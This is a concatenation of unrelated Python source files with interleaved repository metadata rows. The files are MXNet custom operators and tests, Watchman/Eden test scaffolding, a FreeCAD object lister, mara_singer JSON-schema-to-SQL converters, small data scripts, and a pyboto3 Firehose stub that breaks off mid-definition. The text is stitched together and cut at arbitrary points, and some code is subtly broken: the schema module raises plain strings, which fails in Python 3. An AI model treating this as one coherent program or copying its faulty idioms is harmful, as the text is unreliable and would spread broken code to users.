prob = x / mx.nd.sum(x, axis=self.axis, keepdims=True)
self.assign(in_grad[0], req[0], prob * y)
@mx.operator.register("log_sum_exp")
class LogSumExpProp(mx.operator.CustomOpProp):
def __init__(self, axis, keepdims=False):
super(LogSumExpProp, self).__init__(need_top_grad=True)
self.axis = int(axis)
self.keepdims = keepdims in ('True',)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
data_shape = in_shape[0]
oshape = []
for i, x in enumerate(data_shape):
if i == self.axis:
if self.keepdims:
oshape.append(1)
else:
oshape.append(x)
return [data_shape], [tuple(oshape)], []
def create_operator(self, ctx, shapes, dtypes):
return LogSumExpOp(self.axis)
def log_sum_exp(in_sym, axis, keepdims=False, name="log_sum_exp"):
return mx.symbol.Custom(in_sym, name=name,
op_type="log_sum_exp",
axis=axis, keepdims=keepdims)
class ConstantOp(mx.operator.CustomOp):
"""Implementation of mask on minibatch layer.
"""
def __init__(self, data):
self.data = data
def forward(self, is_train, req, in_data, out_data, aux):
if self.data.context != out_data[0].context:
self.data = self.data.copyto(out_data[0].context)
self.assign(out_data[0], req[0], self.data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
raise RuntimeError("cannot bp to constant")
@mx.operator.register("constant")
class ConstantOpProp(mx.operator.CustomOpProp):
def __init__(self, pkl_data):
super(ConstantOpProp, self).__init__(need_top_grad=False)
self.data = pkl.loads(pkl_data)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [self.data.shape], []
def create_operator(self, ctx, shapes, dtypes):
return ConstantOp(mx.nd.array(self.data))
def constant(data, name="constant"):
if isinstance(data, mx.nd.NDArray):
data = data.asnumpy()
pkl_data = pkl.dumps(data)
return mx.symbol.Custom(name=name,
op_type="constant",
pkl_data=pkl_data)
# test case latter
def np_softmax(x, axis):
max_x = np.max(x, axis=axis, keepdims=True)
x = np.exp(x - max_x)
x = x / np.sum(x, axis=axis, keepdims=True)
return x
def np_log_sum_exp(x, axis, keepdims=False):
max_x = np.max(x, axis=axis, keepdims=True)
x = np.log(np.sum(np.exp(x - max_x), axis=axis, keepdims=True))
x = x + max_x
if not keepdims:
x = np.squeeze(x, axis=axis)
return x
def test_log_sum_exp():
xpu = mx.gpu()
shape = (2, 2, 100)
axis = 2
keepdims = True
X = mx.sym.Variable('X')
Y = log_sum_exp(X, axis=axis, keepdims=keepdims)
x = mx.nd.array(np.random.normal(size=shape))
x[:] = 1
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': xgrad})
exec1.forward()
y = exec1.outputs[0]
np.testing.assert_allclose(
y.asnumpy(),
np_log_sum_exp(x.asnumpy(), axis=axis, keepdims=keepdims))
y[:] = 1
exec1.backward([y])
np.testing.assert_allclose(
xgrad.asnumpy(),
np_softmax(x.asnumpy(), axis=axis) * y.asnumpy())
def test_constant():
xpu = mx.gpu()
shape = (2, 2, 100)
x = mx.nd.ones(shape, ctx=xpu)
y = mx.nd.ones(shape, ctx=xpu)
gy = mx.nd.zeros(shape, ctx=xpu)
X = constant(x) + mx.sym.Variable('Y')
xexec = X.bind(xpu,
{'Y': y},
{'Y': gy})
xexec.forward()
np.testing.assert_allclose(
xexec.outputs[0].asnumpy(), (x + y).asnumpy())
xexec.backward([y])
np.testing.assert_allclose(
gy.asnumpy(), y.asnumpy())
if __name__ == "__main__":
test_constant()
test_log_sum_exp()
| 29.684524 | 78 | 0.599158 |
2b26a37c10b5c50aea69f80b8956d25796231621 | 218 | py | Python | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | 4 | 2017-08-23T06:32:19.000Z | 2019-11-05T09:59:24.000Z | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | null | null | null | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | 2 | 2017-09-03T17:32:12.000Z | 2021-02-27T20:12:34.000Z | #!/usr/bin/env python
import xfce4.xfconf
print(xfce4.xfconf.list_channels())
wm = xfce4.xfconf.channel_get("xfwm4")
print(wm.get_properties("/"))
wm = xfce4.xfconf.channel_get("xfwm4")
print(wm.get_properties("/"))
| 21.8 | 38 | 0.738532 |
3f3cf211a67e5e881da50b8397c538c691e70861 | 4,395 | py | Python | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | 1 | 2022-03-20T08:44:44.000Z | 2022-03-20T08:44:44.000Z | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | 2 | 2021-09-28T04:34:54.000Z | 2022-02-26T09:11:45.000Z | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | null | null | null | # vim:ts=4:sw=4:et:
# Copyright 2016-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import os
import tempfile
import WatchmanInstance
import WatchmanTestCase
TestParent = object
try:
import configparser # python3
from eden.integration.lib import edenclient, hgrepo
def is_sandcastle():
return "SANDCASTLE" in os.environ
if edenclient.can_run_eden():
TestParent = WatchmanTestCase.WatchmanTestCase
can_run_eden = edenclient.can_run_eden
except ImportError as e:
def is_buck_build():
return "BUCK_BUILD_ID" in os.environ
# We want import failures to hard fail the build when using buck internally
# because it means we overlooked something, but we want it to be a soft
# fail when we run our opensource build
if is_buck_build():
raise
def can_run_eden():
return False
class WatchmanEdenTestCase(TestParent):
# The contents of the .eden directory
# This is used by several tests when checking reported file lists
eden_dir_entries = [".eden/root", ".eden/socket", ".eden/client", ".eden/this-dir"]
def setUp(self):
super(WatchmanEdenTestCase, self).setUp()
# the eden home directory. We use the global dir for the test runner
# rather than one scoped to the test because we have very real length
# limits on the socket path name that we're likely to hit otherwise.
# fake a home dir so that eden is isolated from the settings
# of the user running these tests.
self.eden_home = tempfile.mkdtemp(prefix="eden_home")
self.eden_dir = os.path.join(self.eden_home, "local/.eden")
os.makedirs(self.eden_dir)
self.etc_eden_dir = os.path.join(self.eden_home, "etc-eden")
os.mkdir(self.etc_eden_dir)
# The directory holding the system configuration files
self.system_config_dir = os.path.join(self.etc_eden_dir, "config.d")
os.mkdir(self.system_config_dir)
# where we'll mount the eden client(s)
self.mounts_dir = self.mkdtemp(prefix="eden_mounts")
self.save_home = os.environ["HOME"]
os.environ["HOME"] = self.eden_home
self.addCleanup(lambda: self._restoreHome())
# Watchman needs to start up with the same HOME as eden, otherwise
# it won't be able to locate the eden socket
self.eden_watchman = WatchmanInstance.Instance()
self.eden_watchman.start()
self.addCleanup(lambda: self.eden_watchman.stop())
self.client = self.getClient(self.eden_watchman)
# chg can interfere with eden, so disable it up front
os.environ["CHGDISABLE"] = "1"
self.eden = edenclient.EdenFS(
self.eden_dir, etc_eden_dir=self.etc_eden_dir, home_dir=self.eden_home
)
self.eden.start()
self.addCleanup(lambda: self.cleanUpEden())
def _restoreHome(self):
# type: () -> None
assert self.save_home is not None
os.environ["HOME"] = self.save_home
def cleanUpEden(self):
# type: () -> None
assert self.eden is not None
self.cleanUpWatches()
self.eden.cleanup()
self.eden = None
def cleanUpWatches(self):
roots = self.watchmanCommand("watch-list")["roots"]
self.watchmanCommand("watch-del-all")
for root in roots:
try:
self.eden.unmount(root)
except Exception:
pass
def makeEdenMount(self, populate_fn=None):
""" populate_fn is a function that accepts a repo object and
that is expected to populate it as a pre-requisite to
starting up the eden mount for it.
"""
repo_path = self.mkdtemp(prefix="eden_repo_")
repo_name = os.path.basename(repo_path)
repo = self.repoForPath(repo_path)
repo.init()
if populate_fn:
populate_fn(repo)
self.eden.add_repository(repo_name, repo_path)
mount_path = os.path.join(self.mounts_dir, repo_name)
self.eden.clone(repo_name, mount_path)
return mount_path
def repoForPath(self, path):
return hgrepo.HgRepository(path)
def setDefaultConfiguration(self):
self.setConfiguration("local", "bser")
| 32.316176 | 87 | 0.65802 |
c0507348a2d55946052827fb1bafe46aaca313c8 | 1,145 | py | Python | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | src/calculate_class_weight.py | JanPalasek/sentiment-analysis-czech | 5e6efe74fa8250f5d1d0c9b02cf8f2271dbbbe87 | [
"MIT"
] | null | null | null | from sklearn.utils import class_weight
import numpy as np
import csv
import argparse
import json
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--dataset_full_path", required=True, type=str)
parser.add_argument("--config_path", required=True, type=str)
args = parser.parse_args()
labels = []
with open(args.dataset_full_path) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
text, label = row["text"], int(row["label"])
labels.append(label)
unique_labels = np.unique(labels)
class_weight = class_weight.compute_class_weight("balanced", unique_labels, labels)
class_weight = np.around(class_weight, decimals=5)
print("CLASS WEIGHT")
print(class_weight)
with open(args.config_path, "r") as file:
config = json.load(file)
with open(args.config_path, "w") as file:
class_weight_config = {str(label): weight for label, weight in zip(unique_labels, class_weight)}
config["train"]["class_weight"] = class_weight_config
json.dump(config, file, indent=2, sort_keys=True)
| 31.805556 | 104 | 0.68559 |
c224f1dca269cde07a3de1ce59f642e061774edd | 4,209 | py | Python | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 6 | 2019-10-31T01:20:33.000Z | 2022-02-02T01:38:08.000Z | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 13 | 2019-10-04T15:38:43.000Z | 2022-03-23T19:01:20.000Z | dev/freecad_test_body_objects/list_objects.py | s-light/io_import_fcstd | 3211961417ebc3f1c0cc4e192ebbc46aed419868 | [
"MIT"
] | 1 | 2019-10-04T23:40:20.000Z | 2019-10-04T23:40:20.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
List Objects.
Stand-alone
"""
import sys
import os
path_to_freecad = "/usr/lib/freecad-daily-python3/lib/FreeCAD.so"
def append_freecad_path():
"""Append the FreeCAD path."""
global path_to_freecad
if os.path.exists(path_to_freecad):
if os.path.isfile(path_to_freecad):
path_to_freecad = os.path.dirname(path_to_freecad)
print("Configured FreeCAD path:", path_to_freecad)
if path_to_freecad not in sys.path:
sys.path.append(path_to_freecad)
else:
print("FreeCAD path is not correct.")
try:
try:
import FreeCAD
except ModuleNotFoundError:
append_freecad_path()
import FreeCAD # noqa
print("FreeCAD version:", FreeCAD.Version())
except ModuleNotFoundError as e:
print("FreeCAD import failed.", e)
# ******************************************
def print_obj_header(
pre_line="",
show_lists=False,
show_list_details=False,
):
"""Print header for objects list."""
print(
pre_line +
"{:<15} {:<25} {:<25}"
"".format("Label", "Name", "TypeId"),
end=''
)
if show_lists:
print(
"{:>2} {:>2} {:>2} {:>2}"
"".format(
"P",
"I",
"O",
"G",
),
end=''
)
if show_list_details:
print(
(
" {:<10}" * 4
).format(
'[Parents]',
'[InList]',
'[OutList]',
'[Group]'
),
end=''
)
print()
def print_obj(
obj,
pre_line="",
show_lists=False,
show_list_details=False,
end="\n",
):
"""Print object nicely formated."""
print(
pre_line +
"{:<25} {:<15} {:<25}"
"".format(obj.Label, obj.Name, obj.TypeId),
end=''
)
if show_lists:
group_count = '_'
if hasattr(obj, 'Group'):
group_count = len(obj.Group)
print(
"{:>2} {:>2} {:>2} {:>2}"
"".format(
len(obj.Parents),
len(obj.InList),
len(obj.OutList),
group_count
),
end=''
)
if show_list_details:
group = None
if hasattr(obj, 'Group'):
group = obj.Group
print(
(
" {:<10}" * 4
).format(
str(obj.Parents),
str(obj.InList),
str(obj.OutList),
str(group)
),
end=''
)
print("", end=end)
def print_objects(
objects,
pre_line="",
pre_list_entry="* ",
show_lists=False,
show_list_details=False,
):
"""Print objects list."""
pre_list_entry_space = " "*len(pre_list_entry)
print_obj_header(
pre_line=pre_line + pre_list_entry_space,
show_lists=show_lists,
show_list_details=show_list_details,
)
for obj in objects:
print_obj(
obj,
pre_line=pre_line + pre_list_entry,
show_lists=show_lists,
show_list_details=show_list_details,
)
def print_obj_with_label(doc, label):
"""Print object with given label."""
obj = doc.getObjectsByLabel(label)
# print(obj)
if len(obj) > 0:
obj = obj[0]
print_obj(obj)
else:
print("object with label '{}' not found.".format(label))
# ******************************************
#
# Main experimetns
#
# ******************************************
doc = FreeCAD.open(
"./BodyTest.FCStd"
)
docname = doc.Name
# ******************************************
print("~"*42)
objects = doc.Objects
print("doc.Objects", len(objects))
print_objects(objects)
print("~"*42)
print_obj_with_label(doc, "BodyTest_Part")
print_obj_with_label(doc, "Body_Hex")
print_obj_with_label(doc, "Sphere_Sun")
print("~"*42)
print("tests done :-)")
FreeCAD.closeDocument(docname)
| 22.508021 | 65 | 0.476598 |
45269b3ea1719b4ff0b963029c7baabf9cbbc44c | 11,099 | py | Python | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | 1 | 2020-10-14T03:38:52.000Z | 2020-10-14T03:38:52.000Z | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | 11 | 2020-07-22T09:57:58.000Z | 2020-11-19T13:45:15.000Z | mara_singer/schema.py | hz-lschick/mara-singer | 733cf407a3a9aa494204c0d681f52b9017fc9e2e | [
"MIT"
] | null | null | null | from functools import singledispatch
from mara_db import dbs
@singledispatch
def jsonschema_to_sql_create_table(db: object, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False) -> str:
"""
Creates an SQL create table statement from an JSON schema.
Args:
db: The destination db object
jsonschema: The JSON schema.
table_name: The destination table name.
key_properties: (Optional) The properties which are key properties, so, they must be provided (NOT NULL)
properties: (Optional) The properties which shall be added to the table. If not given, all properties will be added to the table. Note: properties from key_properties are always added.
create_if_not_exists: If the SQL create table statement should be a 'CREATE TABLE IF NOT EXISTS' statement.
"""
raise NotImplementedError(f'Please implement jsonschema_to_sql_create_table for type "{db.__class__.__name__}"')
@jsonschema_to_sql_create_table.register(str)
def __(alias: str, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False) -> str:
return jsonschema_to_sql_create_table(dbs.db(alias), jsonschema=jsonschema, table_name=table_name, key_properties=key_properties, properties=properties, create_if_not_exists=create_if_not_exists)
@jsonschema_to_sql_create_table.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False):
if jsonschema.get('type') != 'object' and jsonschema.get('type') != ['null', 'object']:
raise Exception('The JSON schema must be of type object to be convertable to a SQL table')
if 'additionalProperties' in jsonschema and jsonschema['additionalProperties'] == True:
raise Exception('The JSON schema must not allow additional properties in its main object to be convertable to a SQL table')
fields = []
for property_name, property_definition in jsonschema['properties'].items():
if not properties or (property_name in properties or (key_properties and property_name in key_properties)):
fields.append(_jsonschema_property_to_sql_field_definition(db, property_name, property_definition, key_properties))
if create_if_not_exists:
sql = 'CREATE TABLE IF NOT EXISTS {} (\n {}\n)'.format(table_name, ',\n '.join(fields))
else:
sql = 'CREATE TABLE {} (\n {}\n)'.format(table_name, ',\n '.join(fields))
return sql
@jsonschema_to_sql_create_table.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, jsonschema, table_name: str = None, key_properties: [str] = None, properties: [str] = None, create_if_not_exists: bool = False):
if jsonschema.get('type') != 'object' and jsonschema.get('type') != ['null', 'object']:
raise Exception('The JSON schema must be of type object to be convertable to a SQL table')
if 'additionalProperties' in jsonschema and jsonschema['additionalProperties'] == True:
raise Exception('The JSON schema must not allow additional properties in its main object to be convertable to a SQL table')
fields = []
for property_name, property_definition in jsonschema['properties'].items():
if not properties or (property_name in properties or (key_properties and property_name in key_properties)):
fields.append(_jsonschema_property_to_sql_field_definition(db, property_name, property_definition, key_properties))
if create_if_not_exists:
sql = 'CREATE TABLE IF NOT EXISTS {} (\n {}\n)'.format(table_name, ',\n '.join(fields))
else:
sql = 'CREATE TABLE {} (\n {}\n)'.format(table_name, ',\n '.join(fields))
return sql
@singledispatch
def _jsonschema_property_type_to_db_type(db: object, type: str, format: str = None):
raise NotImplementedError(f'Please implement _jsonschema_property_type_map for type "{db.__class__.__name__}"')
@_jsonschema_property_type_to_db_type.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, type, format = None):
if type == 'string':
if format == 'date':
return 'DATE'
if format == 'date-time':
return 'TIMESTAMP'
return 'TEXT'
if type == 'boolean':
return 'BOOLEAN'
if type == 'integer':
return 'BIGINT'
raise Exception(f'Could not map type \'{type}\' with format \'{format}\'')
@_jsonschema_property_type_to_db_type.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, type, format = None):
if type == 'string':
if format == 'date':
return 'DATE'
if format == 'date-time':
return 'TIMESTAMP'
return 'STRING'
if type == 'boolean':
return 'BOOL'
if type == 'integer':
return 'INT64'
if type == 'number':
return 'NUMERIC'
raise Exception(f'Could not map type \'{type}\' with format \'{format}\'')
@singledispatch
def _jsonschema_property_to_sql_field_definition(db: object, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
raise NotImplementedError(f'Please implement _jsonschema_property_to_sql_field_definition for type "{db.__class__.__name__}"')
@_jsonschema_property_to_sql_field_definition.register(dbs.PostgreSQLDB)
def __(db: dbs.PostgreSQLDB, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
field_type = None
is_nullable = None
if not field_type and 'type' in property_definition:
if isinstance(property_definition['type'], list):
typeList = property_definition['type']
else:
typeList = [property_definition['type']]
for type in typeList:
if type == "null":
is_nullable = True
elif type == "object":
raise NotImplementedError('JSON object type --> Composite type creation is not yet implemented for PostgreSQLDB')
elif type == "array":
if 'items' in property_definition:
field_type = '{}[]'.format(_jsonschema_property_to_sql_field_definition(db, property_name=None, property_definition=property_definition['items']))
else:
# hack for tap-adwords:
if field_type:
continue # sometimes e.g. tap-adwords has 'null, integer, string' as a type --> is the money type. We assume here always to use the integer value
if 'format' in property_definition:
field_type = _jsonschema_property_type_to_db_type(db, type=type, format=property_definition['format'])
else:
field_type = _jsonschema_property_type_to_db_type(db, type=type)
if not field_type and 'anyOf' in property_definition:
if property_definition['anyOf'][0]['type'] != "array":
raise "Unexpected type for property {}".format(property_name)
field_type = '{}[]'.format(property_definition['anyOf'][0]['items']['type'])
if property_definition['anyOf'][1]['type'] == "null":
is_nullable = True
if not field_type:
raise Exception(f'Could not determine field type for property {property_name}')
if is_nullable and key_properties and property_name in key_properties:
is_nullable = False
if is_nullable and not ignore_nullable:
if not property_name:
return field_type
return '{} {}'.format(property_name, field_type)
else:
if not property_name:
return field_type
return '{} {} NOT NULL'.format(property_name, field_type)
@_jsonschema_property_to_sql_field_definition.register(dbs.BigQueryDB)
def __(db: dbs.BigQueryDB, property_name, property_definition, key_properties: [str] = None, ignore_nullable: bool = False):
field_type = None
is_nullable = None
if not field_type and 'type' in property_definition:
if isinstance(property_definition['type'], list):
typeList = property_definition['type']
else:
typeList = [property_definition['type']]
for type in typeList:
if type == "null":
is_nullable = True
elif type == "object":
if 'properties' in property_definition:
sub_properties = []
for sub_property_name, sub_property_definition in property_definition['properties'].items():
sub_properties.append(_jsonschema_property_to_sql_field_definition(db, property_name=sub_property_name, property_definition=sub_property_definition))
if len(sub_properties) == 0:
field_type = 'STRING'
else:
field_type = 'STRUCT<{}>'.format(', '.join(sub_properties))
else:
raise Exception(f'Unknown usage of type {type} for property {property_name}')
elif type == "array":
if 'items' in property_definition:
field_type = 'ARRAY<{}>'.format(_jsonschema_property_to_sql_field_definition(db, property_name=None, property_definition=property_definition['items']))
else:
# hack for tap-adwords:
if field_type:
continue # sometimes e.g. tap-adwords has 'null, integer, string' as a type --> is the money type. We assume here always to use the integer value
if 'format' in property_definition:
field_type = _jsonschema_property_type_to_db_type(db, type=type, format=property_definition['format'])
else:
field_type = _jsonschema_property_type_to_db_type(db, type=type)
if not field_type and 'anyOf' in property_definition:
if property_definition['anyOf'][0]['type'] != "array":
raise "Unexpected type for property {}".format(property_name)
field_type = 'ARRAY<{}>'.format(property_definition['anyOf'][0]['items']['type'])
if property_definition['anyOf'][1]['type'] == "null":
is_nullable = True
if not field_type:
raise Exception(f'Could not determine field type for property {property_name}')
if is_nullable and key_properties and property_name in key_properties:
is_nullable = False
# Big Query does not support NOT NULL arrays. When you try to create a column with ARRAY<> NOT NULL, you get the error:
# NOT NULL cannot be applied to ARRAY field '<COLUMN_NAME>'. NULL arrays are always stored as an empty array.
if str.startswith(field_type, 'ARRAY') and not is_nullable:
is_nullable = True
if is_nullable and not ignore_nullable:
if not property_name:
return field_type
return '{} {}'.format(property_name, field_type)
else:
if not property_name:
return field_type
return '{} {} NOT NULL'.format(property_name, field_type)
| 49.328889 | 199 | 0.669249 |
828c95495f29c8a0e292de686d8856c4a5975083 | 207 | py | Python | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 27 | 2018-11-11T12:55:10.000Z | 2021-11-15T01:43:01.000Z | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 10 | 2018-12-06T18:50:21.000Z | 2021-11-08T16:34:47.000Z | demo/CLI/yearpredMSD/csv2libsvm.py | bclehmann/xgboost | 345796825f7bbeb0251bca1244e296fda211551b | [
"Apache-2.0"
] | 15 | 2019-01-25T18:21:39.000Z | 2021-12-15T14:47:03.000Z | import sys
fo = open(sys.argv[2], 'w')
for l in open(sys.argv[1]):
arr = l.split(',')
fo.write('%s' % arr[0])
for i in range(len(arr) - 1):
fo.write(' %d:%s' % (i, arr[i+1]))
fo.close()
| 20.7 | 42 | 0.497585 |
b2c8621d33ec4d83b0186232c3d517951ec2d31d | 279,299 | py | Python | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 91 | 2016-12-31T11:38:37.000Z | 2021-09-16T19:33:23.000Z | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 7 | 2017-01-02T18:54:23.000Z | 2020-08-11T13:54:02.000Z | pyboto3/firehose.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 26 | 2016-12-31T13:11:00.000Z | 2022-03-03T21:01:12.000Z | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_delivery_stream(DeliveryStreamName=None, DeliveryStreamType=None, KinesisStreamSourceConfiguration=None, DeliveryStreamEncryptionConfigurationInput=None, S3DestinationConfiguration=None, ExtendedS3DestinationConfiguration=None, RedshiftDestinationConfiguration=None, ElasticsearchDestinationConfiguration=None, SplunkDestinationConfiguration=None, Tags=None):
"""
Creates a Kinesis Data Firehose delivery stream.
By default, you can create up to 50 delivery streams per AWS Region.
This is an asynchronous operation that immediately returns. The initial status of the delivery stream is CREATING . After the delivery stream is created, its status is ACTIVE and it now accepts data. If the delivery stream creation fails, the status transitions to CREATING_FAILED . Attempts to send data to a delivery stream that is not in the ACTIVE state cause an exception. To check the state of a delivery stream, use DescribeDeliveryStream .
If the status of a delivery stream is CREATING_FAILED , this status doesn\'t change, and you can\'t invoke CreateDeliveryStream again on it. However, you can invoke the DeleteDeliveryStream operation to delete it.
A Kinesis Data Firehose delivery stream can be configured to receive records directly from providers using PutRecord or PutRecordBatch , or it can be configured to use an existing Kinesis stream as its source. To specify a Kinesis data stream as input, set the DeliveryStreamType parameter to KinesisStreamAsSource , and provide the Kinesis stream Amazon Resource Name (ARN) and role ARN in the KinesisStreamSourceConfiguration parameter.
To create a delivery stream with server-side encryption (SSE) enabled, include DeliveryStreamEncryptionConfigurationInput in your request. This is optional. You can also invoke StartDeliveryStreamEncryption to turn on SSE for an existing delivery stream that doesn\'t have SSE enabled.
A delivery stream is configured with a single destination: Amazon S3, Amazon ES, Amazon Redshift, or Splunk. You must specify only one of the following destination configuration parameters: ExtendedS3DestinationConfiguration , S3DestinationConfiguration , ElasticsearchDestinationConfiguration , RedshiftDestinationConfiguration , or SplunkDestinationConfiguration .
When you specify S3DestinationConfiguration , you can also provide the following optional values: BufferingHints, EncryptionConfiguration , and CompressionFormat . By default, if no BufferingHints value is provided, Kinesis Data Firehose buffers data up to 5 MB or for 5 minutes, whichever condition is satisfied first. BufferingHints is a hint, so there are some cases where the service cannot adhere to these conditions strictly. For example, record boundaries might be such that the size is a little over or under the configured buffering size. By default, no encryption is performed. We strongly recommend that you enable encryption to ensure secure data storage in Amazon S3.
A few notes about Amazon Redshift as a destination:
Kinesis Data Firehose assumes the IAM role that is configured as part of the destination. The role should allow the Kinesis Data Firehose principal to assume the role, and the role should have permissions that allow the service to deliver the data. For more information, see Grant Kinesis Data Firehose Access to an Amazon S3 Destination in the Amazon Kinesis Data Firehose Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.create_delivery_stream(
DeliveryStreamName='string',
DeliveryStreamType='DirectPut'|'KinesisStreamAsSource',
KinesisStreamSourceConfiguration={
'KinesisStreamARN': 'string',
'RoleARN': 'string'
},
DeliveryStreamEncryptionConfigurationInput={
'KeyARN': 'string',
'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK'
},
S3DestinationConfiguration={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ExtendedS3DestinationConfiguration={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupConfiguration': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
